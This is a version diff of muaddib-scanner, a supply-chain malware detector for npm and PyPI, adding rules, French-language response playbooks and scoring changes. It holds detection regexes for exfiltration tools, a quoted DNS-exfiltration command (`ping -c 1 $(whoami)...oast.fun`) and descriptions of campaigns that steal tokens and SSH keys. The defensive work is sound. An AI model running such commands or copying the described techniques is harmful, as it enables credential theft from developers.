muaddib-scanner 2.10.93 → 2.10.95

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.10.93",
+  "version": "2.10.95",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/src/monitor/classify.js

@@ -63,7 +63,10 @@ const HIGH_CONFIDENCE_MALICE_TYPES = new Set([
   'function_constructor_require',          // new Function.constructor("require") (RCE evasion)
   'newsletter_auto_follow',                // Baileys WhatsApp newsletter hijack
   // v2.10.93: Security review 2026-04-10→17 findings
-  'self_destruct_eval'                     // dynamic exec + unlink __filename (csec anti-forensics)
+  'self_destruct_eval',                    // dynamic exec + unlink __filename (csec anti-forensics)
+  // v2.10.94: MT-1 ceiling bypass for ltidi and csec under-threshold cases
+  'external_tarball_dep',                  // dep URL = tarball on third-party host (ltidi chain)
+  'function_runtime_args'                  // new Function('require','__dirname','__filename',...) pattern (csec)
 ]);
 
 // Lifecycle compound types that indicate real malicious intent beyond a simple postinstall

package/src/response/playbooks.js

@@ -886,6 +886,16 @@ const PLAYBOOKS = {
     'CRITIQUE: Execution dynamique de code (eval/new Function/Module._compile) + auto-suppression du fichier execute (unlinkSync/renameSync sur __filename). ' +
     'Pattern anti-forensique professionnel: le malware execute son payload obfusque puis efface ses traces. Campagne csec-crypto-toolkit (avril 2026) exfiltre .env, GITHUB_TOKEN, NPM_TOKEN, AWS/SSH keys vers csec-supply-chain-attack.vercel.app, puis unlinkSync(__filename). ' +
     'Machine compromise si deja installe. Rotation immediate de TOUS les secrets (.env, tokens CI/CD, cles SSH). Verifier les .env des repertoires parents jusqu\'a 6 niveaux. Supprimer le package.',
+
+  function_runtime_args:
+    'CRITIQUE: new Function() appele avec les identifiants runtime Node (require, __dirname, __filename) passes comme arguments string literal + corps dynamique. ' +
+    'Pattern csec-crypto-toolkit: l\'attaquant injecte le contexte Node complet dans un payload obfusque execute en memoire, contournant la detection de require() standard. Aucun package legitime n\'utilise ce pattern. ' +
+    'Lire le contenu de l\'argument body. Tracer la source (souvent XOR/base64 decode). Isoler et supprimer.',
+
+  external_tarball_dep:
+    'CRITIQUE: Dependance declaree avec URL tarball (.tgz/.tar.gz) hebergee hors des registres npm legitimes (github.com, gitlab.com, bitbucket.org, registry.npmjs.org). ' +
+    'Pattern ltidi chain attack (avril 2026): le stub publie sur npm n\'a aucun install hook visible, la charge utile est hebergee sur un cloud storage (GCS, S3, CDN) et contourne entierement l\'audit du registre npm. ' +
+    'Verifier le contenu de la tarball distante avant toute installation. Supprimer le package. Signaler au registre npm.',
 };
 
 function getPlaybook(threatType) {

package/src/rules/index.js

@@ -2276,6 +2276,30 @@ const RULES = {
     ],
     mitre: 'T1070.004'
   },
+  function_runtime_args: {
+    id: 'MUADDIB-AST-090',
+    name: 'Function() with Runtime Identifiers as Arguments',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'new Function() appele avec des identifiants runtime (require, __dirname, __filename, module, exports, process) passes comme arguments string literal, et un corps dynamique (variable, expression). Pattern csec-crypto-toolkit: l\'attaquant injecte le contexte Node complet dans un payload obfusque execute en memoire, contournant la detection require() standard. Aucun package legitime ne passe require + __filename a new Function.',
+    references: [
+      'https://attack.mitre.org/techniques/T1059.007/',
+      'https://attack.mitre.org/techniques/T1027/'
+    ],
+    mitre: 'T1059.007'
+  },
+  external_tarball_dep: {
+    id: 'MUADDIB-PKG-020',
+    name: 'External Tarball Dependency URL',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'Dependance declaree avec une URL tarball (.tgz/.tar.gz/.tar.bz2/.zip) hebergee hors des registres npm legitimes (github.com, gitlab.com, bitbucket.org, registry.npmjs.org, registry.yarnpkg.com). Pattern ltidi chain attack (avril 2026): le stub publie sur npm n\'a pas d\'install hook visible, la charge utile est hebergee sur un cloud storage (GCS, S3, CDN) et contourne entierement l\'audit du registre npm. Attention: MT-1 score ceiling (cap non-lifecycle a 35) bypasse via HIGH_CONFIDENCE_MALICE_TYPES.',
+    references: [
+      'https://attack.mitre.org/techniques/T1195.002/',
+      'https://attack.mitre.org/techniques/T1105/'
+    ],
+    mitre: 'T1195.002'
+  },
   version_99_preinstall: {
     id: 'MUADDIB-PKG-019',
     name: 'Dependency Confusion Version Indicator',

package/src/scanner/ast-detectors/handle-new-expression.js

@@ -11,6 +11,35 @@ const {
 
 function handleNewExpression(node, ctx) {
   if (node.callee.type === 'Identifier' && node.callee.name === 'Function') {
+    // v2.10.94: detect new Function('require', '__dirname', '__filename', <dynamic>)
+    // csec-crypto-toolkit pattern. Gated by obfuscation signal to avoid FP on
+    // legitimate CommonJS module wrappers used by babel-register, ts-node, pirates,
+    // jest, nyc, vitest etc. which call new Function('module', 'exports', 'require',
+    // compiledCode). Those transpilers DO NOT have fromCharCode/base64 decode loops
+    // in the same file — csec does.
+    if (node.arguments.length >= 3) {
+      const RUNTIME_ARG_NAMES = new Set(['require', '__dirname', '__filename', 'module', 'exports', 'process']);
+      const bodyArg = node.arguments[node.arguments.length - 1];
+      const argNameLiterals = node.arguments.slice(0, -1)
+        .map(a => (a.type === 'Literal' && typeof a.value === 'string') ? a.value : null);
+      const runtimeArgCount = argNameLiterals.filter(v => v !== null && RUNTIME_ARG_NAMES.has(v)).length;
+      const bodyIsDynamic = bodyArg.type !== 'Literal';
+      // FP gate: require an obfuscation/decode signal in the same file.
+      // ctx.hasFromCharCode catches XOR/charcode loops (csec).
+      // ctx.hasBase64Decode catches Buffer.from(..., 'base64') patterns.
+      // ctx.hasZlibInflate catches zlib + base64 payloads.
+      const hasObfuscationContext = ctx.hasFromCharCode || ctx.hasBase64Decode || ctx.hasZlibInflate;
+      if (runtimeArgCount >= 2 && bodyIsDynamic && hasObfuscationContext) {
+        ctx.hasDynamicExec = true;
+        ctx.threats.push({
+          type: 'function_runtime_args',
+          severity: 'CRITICAL',
+          message: `new Function() passes runtime identifiers (${argNameLiterals.filter(Boolean).join(', ')}) to a dynamic body in a file containing decode/obfuscation patterns — csec-style obfuscated payload with full Node.js context.`,
+          file: ctx.relFile
+        });
+        return;
+      }
+    }
     // Skip string literal args — zero-risk globalThis polyfills used by every bundler
     if (!hasOnlyStringLiteralArgs(node)) {
       ctx.hasDynamicExec = true;

package/src/scanner/ast-detectors/handle-post-walk.js

@@ -135,6 +135,12 @@ function handlePostWalk(ctx) {
   // B4: removed fetchOnlySafeDomains guard — compound requires fetch+chmod+exec, which is never legitimate
   // C10: If file also contains hash/checksum verification, downgrade to HIGH — real droppers
   // don't verify payload integrity; legitimate installers (esbuild, sharp) do.
+  // v2.10.95: hasHashVerification is now gated by presence of a comparison operator
+  // in the same file (see ast.js:211 — best-effort heuristic). No additional tier
+  // added: diagnostic on 545 benign packages showed download_exec_binary fires on
+  // only 3 packages (esbuild, yarn, @backstage/create-app) and their final score is
+  // dominated by other CRITICAL rules, so a MEDIUM tier here had 0 FPR impact.
+  // Full validation in data/fp-v2.10.95-validation.md.
   if (ctx.hasRemoteFetch && ctx.hasChmodExecutable && ctx.hasExecSyncCall) {
     ctx.threats.push({
       type: 'download_exec_binary',

package/src/scanner/ast.js

@@ -205,10 +205,20 @@ function analyzeFile(content, filePath, basePath) {
     stringBuildVars: new Set(),   // variables assigned from BinaryExpression with '+' (string concat)
     // Audit v3 B2: Entropy split detection — high-entropy string concat + eval/decode
     highEntropyConcatFound: false, // set when a concat chain with >=3 leaves and high combined entropy is found
-    // C10: Hash verification — legitimate binary installers verify checksums
-    // Requires BOTH createHash() call AND .digest() call — false positives from
-    // standalone mentions of 'sha256' or 'integrity' in comments/descriptions
-    hasHashVerification: /\bcreateHash\s*\(/.test(content) && /\.digest\s*\(/.test(content),
+    // C10: Hash verification — legitimate binary installers verify checksums.
+    // v2.10.95: file-level heuristic durcie par un check de comparaison. Requires
+    // createHash+digest AND at least one comparison/assert/throw in the same file.
+    // THIS IS NOT A PROOF that the hash is actually verified — a malicious author
+    // can include a === or assert elsewhere in the file without comparing the
+    // digest result. This gate is best-effort and gains value only through the
+    // triple-gate in handle-post-walk.js (requires also fetchOnlySafeDomains).
+    // Proper fix would require function-scope AST tracking to confirm the
+    // comparison consumes the digest result — deferred until a dedicated
+    // taint-tracking PR.
+    hasHashVerification:
+      /\bcreateHash\s*\(/.test(content) &&
+      /\.digest\s*\(/.test(content) &&
+      /\b(===|!==|\.equals\s*\(|assert\.(strictEqual|equal|deepEqual|deepStrictEqual)\s*\(|\bthrow\b)/.test(content),
     // GlassWorm: variation selector decoder pattern (.codePointAt + 0xFE00/0xE0100)
     hasCodePointAt: false,
     hasVariationSelectorConst: false,

package/src/scanner/package.js

@@ -119,15 +119,17 @@ async function scanPackageJson(targetPath) {
       // v2.10.89: curl/wget + env/base64 exfiltration in lifecycle scripts
       // Catches: apache-arrow-14 (score 9→CRITICAL), @signals-notebook (score 9→CRITICAL)
       // Pattern: curl -d $(env|base64) URL, curl -X POST URL?env=$(env|base64 -w0)
+      // v2.10.94: extended to ping/nslookup/dig/host/getent — DNS exfil variants.
+      // Catches: koa-v3@9.4.0 which uses `ping -c 1 $(whoami).<hex>.oast.fun` instead of curl.
       if (['preinstall', 'install', 'postinstall'].includes(scriptName) &&
-          /\b(curl|wget)\b/.test(scriptContent) &&
+          /\b(curl|wget|ping|nslookup|dig|host|getent)\b/.test(scriptContent) &&
           (/\$\(.*\b(env|id|whoami|uname|hostname)\b/.test(scriptContent) ||
            (/\bbase64\b/.test(scriptContent) && !/\|\s*(sh|bash)\b/.test(scriptContent)))) {
         // Exclude curl|sh which is already caught by lifecycle_shell_pipe
         threats.push({
           type: 'curl_env_exfil',
           severity: 'CRITICAL',
-          message: `Critical: "${scriptName}" uses curl/wget with env/base64 exfiltration — credential theft via lifecycle script.`,
+          message: `Critical: "${scriptName}" uses DNS/HTTP exfil tool (curl/wget/ping/nslookup/dig) with env/base64 payload — credential theft via lifecycle script.`,
           file: 'package.json'
         });
       }
@@ -355,8 +357,13 @@ async function scanPackageJson(targetPath) {
         note = ' (unusual, verify source)';
       }
 
+      // v2.10.94: External tarball on third-party host emits a distinct type
+      // so MT-1 score ceiling (caps non-lifecycle, non-HC packages at 35) can be
+      // bypassed via HIGH_CONFIDENCE_MALICE_TYPES. ltidi stubs have no install
+      // hooks, so the dep URL is the only signal and must be HC-classified.
+      const threatType = isExternalTarball ? 'external_tarball_dep' : 'dependency_url_suspicious';
       threats.push({
-        type: 'dependency_url_suspicious',
+        type: threatType,
         severity,
         message: `Dependency "${depName}" uses HTTP URL: ${depVersion}${note}`,
         file: 'package.json'

package/src/scoring.js

@@ -118,7 +118,9 @@ const PACKAGE_LEVEL_TYPES = new Set([
   'lifecycle_missing_script',
   // v2.10.89: Security review compounds
   'lifecycle_newsletter_hijack', 'lifecycle_env_exfil',
-  'curl_env_exfil', 'version_99_preinstall'
+  'curl_env_exfil', 'version_99_preinstall',
+  // v2.10.94: new package-level type for ltidi chain attack (dep URL on third-party host)
+  'external_tarball_dep'
 ]);
 
 /**
@@ -254,6 +256,8 @@ const DIST_EXEMPT_TYPES = new Set([
   'curl_env_exfil',           // curl/wget env exfil in lifecycle (always malicious)
   'function_constructor_require', // new Function.constructor("require") (always malicious)
   'self_destruct_eval',       // dynamic exec + unlink __filename (csec anti-forensics)
+  'function_runtime_args',    // new Function('require','__dirname','__filename',...) + obfuscation (csec)
+  'external_tarball_dep',     // dep URL tarball on third-party host (ltidi chain)
   // Dangerous shell commands in dist/ are real threats, never bundler output
   'dangerous_exec',
   // Compound scoring rules — co-occurrence signals, never FP
@@ -894,6 +898,16 @@ function calculateRiskScore(deduped, intentResult) {
   if (packageScore >= 25 && packageLevelThreats.some(t => t.severity === 'CRITICAL')) {
     packageScore = Math.max(packageScore, 50);
   }
+  // v2.10.94: Co-occurrence floor — 2+ distinct CRITICAL package-level types (different
+  // threat types, not duplicates) is a near-unambiguous malware signature. Lifts to 75
+  // (CRITICAL tier) so the final risk level reflects real severity instead of stopping
+  // at HIGH. Catches apache-arrow-14 (curl_env_exfil + lifecycle_env_exfil compound).
+  const criticalPkgTypes = new Set(
+    packageLevelThreats.filter(t => t.severity === 'CRITICAL').map(t => t.type)
+  );
+  if (criticalPkgTypes.size >= 2) {
+    packageScore = Math.max(packageScore, 75);
+  }
 
   // 5. Cross-file bonus: aggregate signal from non-max files
   // A package with 3 files each scoring 20 is more suspicious than 1 file scoring 20.